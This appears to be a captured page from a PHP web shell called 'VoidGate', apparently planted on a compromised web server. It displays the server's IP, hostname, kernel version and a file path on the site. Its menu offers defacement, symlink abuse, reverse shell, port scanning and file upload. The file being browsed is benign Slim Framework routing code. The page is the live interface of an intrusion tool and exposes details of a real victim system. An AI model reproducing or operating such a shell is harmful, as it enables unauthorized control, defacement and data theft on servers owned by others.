ヤミRoot VoidGate
User / IP
:
216.73.216.143
Host / Server
:
146.88.233.70 / dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
logercm
/
api.loger.cm
/
logermicroservice
/
controllers
/
Slim
/
vendor
/
slim
/
slim
/
Slim
/
Viewing: RouteGroup.php
<?php /** * Slim Framework (https://slimframework.com) * * @link https://github.com/slimphp/Slim * @copyright Copyright (c) 2011-2017 Josh Lockhart * @license https://github.com/slimphp/Slim/blob/3.x/LICENSE.md (MIT License) */ namespace Slim; use Closure; use Slim\Interfaces\RouteGroupInterface; /** * A collector for Routable objects with a common middleware stack * * @package Slim */ class RouteGroup extends Routable implements RouteGroupInterface { /** * Create a new RouteGroup * * @param string $pattern The pattern prefix for the group * @param callable $callable The group callable */ public function __construct($pattern, $callable) { $this->pattern = $pattern; $this->callable = $callable; } /** * Invoke the group to register any Routable objects within it. * * @param App $app The App instance to bind/pass to the group callable */ public function __invoke(App $app = null) { $callable = $this->resolveCallable($this->callable); if ($callable instanceof Closure && $app !== null) { $callable = $callable->bindTo($app); } $callable($app); } }
Coded With 💗 by
0x6ick